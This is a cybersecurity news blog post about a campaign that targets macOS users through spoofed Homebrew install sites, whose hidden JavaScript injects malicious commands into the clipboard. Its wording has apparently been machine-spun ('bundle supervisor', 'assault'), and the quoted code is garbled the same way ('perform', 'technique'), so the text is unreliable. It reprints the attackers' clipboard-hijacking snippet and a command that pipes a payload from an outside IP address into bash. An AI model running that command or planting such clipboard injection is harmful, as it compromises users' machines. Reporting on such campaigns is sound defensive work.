Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Hackers Attacking macOS Users With Spoofed Homebrew Websites to Inject Malicious Payloads

Posted on October 14, 2025October 14, 2025 By CWS

A complicated marketing campaign focusing on macOS customers has emerged via spoofed Homebrew installer web sites that ship malicious payloads alongside reputable bundle supervisor installations.

The assault exploits the widespread belief customers place within the fashionable Homebrew bundle supervisor by creating pixel-perfect replicas of the official brew[.]sh set up web page, full with misleading clipboard manipulation methods.

Safety researchers have recognized a number of fraudulent domains mimicking the reputable Homebrew web site, together with homebrewfaq[.]org, homebrewclubs[.]org, and homebrewupdate[.]org.

These malicious websites current convincing replicas of the official set up interface however incorporate hidden JavaScript designed to inject extra instructions into customers’ clipboards with out their information.

Not like genuine Homebrew pages that enable handbook textual content choice, these spoofed variations drive customers to make the most of a delegated Copy button, enabling attackers to insert malicious payloads alongside commonplace set up instructions.

Homebrew set up web page (Supply – The Sequence)

The marketing campaign represents a major evolution in provide chain assaults, focusing on not the bundle repositories themselves however the preliminary set up course of.

Whereas Homebrew has maintained a powerful safety monitor document with no current compromises, menace actors have found an efficient workaround by impersonating the trusted set up supply.

Spoofed Homebrew set up web page (Supply – The Sequence)

The Sequence analysts recognized this rising menace sample via systematic monitoring of suspicious domains and infrastructure related to identified malware distribution networks.

The assault methodology demonstrates outstanding sophistication in its execution and evasion capabilities.

Quite than compromising reputable bundle repositories, attackers have developed a parallel infrastructure that intercepts customers through the crucial set up section.

This strategy bypasses conventional safety measures centered on repository monitoring whereas exploiting the inherent belief customers place in acquainted set up procedures.

Superior Clipboard Manipulation Strategies

The core an infection mechanism depends on JavaScript-based clipboard manipulation that operates transparently to the sufferer.

When customers click on the Copy button on spoofed websites, embedded code executes a collection of operations designed to inject malicious instructions alongside the anticipated Homebrew set up script.

The JavaScript implementation consists of Russian-language feedback explicitly indicating the place malicious instructions ought to be inserted, suggesting a commodity-style menace service.

The malicious script prevents commonplace textual content choice via occasion listeners that disable contextmenu, selectstart, copy, minimize, and dragstart operations on the set up block.

This forces victims to make use of the supplied Copy button, which triggers the copyInstallCommand() perform. The perform writes a predetermined command to the clipboard utilizing both the trendy Clipboard API or fallback textarea strategies for compatibility throughout completely different browser environments.

const copyCommand = ‘echo ‘; // ← замени на нужную
async perform copyInstallCommand () {
await navigator[.]clipboard[.]writeText (copyCommand);
fetch (‘notify[.]php’, {
technique: ‘POST’,
headers: { ‘Content material-Kind’: ‘utility / json’ },
physique: JSON[.]stringify ({ occasion: ‘copy_install_command’, time: new Date () })
});
}

Evaluation revealed that lively campaigns make the most of instructions reminiscent of curl – s http[:]//185[.]93[.]89[.]62/d/vipx69930 | nohup bash & which downloads and executes extra payloads within the background whereas the reputable Homebrew set up proceeds usually, creating an efficient dual-execution situation that maintains operational stealth whereas establishing persistent entry to compromised techniques.

Comply with us on Google Information, LinkedIn, and X to Get Extra Prompt Updates, Set CSN as a Most well-liked Supply in Google.

Cyber Security News Tags:Attacking, Hackers, Homebrew, Inject, macOS, Malicious, Payloads, Spoofed, Users, Websites

Post navigation

Previous Post: Researchers Expose TA585’s MonsterV2 Malware Capabilities and Attack Chain
Next Post: Russian Cybercrime Market Hub Transferring from RDP Access to Malware Stealer Logs to Access

Related Posts

macOS ‘Sploitlight’ Vulnerability Let Attackers Steal Private Data of Files Bypassing TCC Cyber Security News
SesameOp Leveraging OpenAI Assistants API for Stealthy Communication with C2 Servers Cyber Security News
L7 DDoS Botnet Hijacked 5.76M Devices to Launch Massive Attacks Cyber Security News
IRGC-Linked APT35 Structure, Tools, and Espionage Operations Disclosed Cyber Security News
RevengeHotels Leveraging AI To Attack Windows Users With VenomRAT Cyber Security News
Shai Hulud v2 Exploits GitHub Actions Workflows as Attack Vector to Steal Secrets Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Hackers Infiltrated n8n’s Community Node Ecosystem With a Weaponized npm Package
  • Telegram Exposes Real Users IP Addresses, Bypassing Proxies on Android and iOS in 1-click
  • n8n Supply Chain Attack Abuses Community Nodes to Steal OAuth Tokens
  • Cyber Insights 2026: What CISOs Can Expect in 2026 and Beyond
  • InvisibleJS Emerges as Stealthy JavaScript Obfuscator Using Zero-Width Characters

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Hackers Infiltrated n8n’s Community Node Ecosystem With a Weaponized npm Package
  • Telegram Exposes Real Users IP Addresses, Bypassing Proxies on Android and iOS in 1-click
  • n8n Supply Chain Attack Abuses Community Nodes to Steal OAuth Tokens
  • Cyber Insights 2026: What CISOs Can Expect in 2026 and Beyond
  • InvisibleJS Emerges as Stealthy JavaScript Obfuscator Using Zero-Width Characters

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark